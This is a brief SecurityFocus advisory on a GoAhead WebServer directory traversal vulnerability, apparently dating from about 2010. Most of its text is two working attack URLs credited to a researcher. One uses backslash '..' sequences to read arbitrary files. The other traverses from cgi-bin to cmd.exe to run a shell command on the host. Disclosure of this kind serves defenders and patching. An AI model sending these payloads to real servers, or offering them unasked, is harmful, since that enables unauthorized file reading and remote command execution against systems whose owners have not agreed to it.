GoAhead WebServer Directory Traversal Vulnerability

The following examples have been provided by Sergey Nenashev <alf@ntvi.ru>:

Gaining access to a known file:

http://target/..\..\..\..\..\..\filename

Executing arbitrary commands:

http://target/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\


 

Privacy Statement
Copyright 2010, SecurityFocus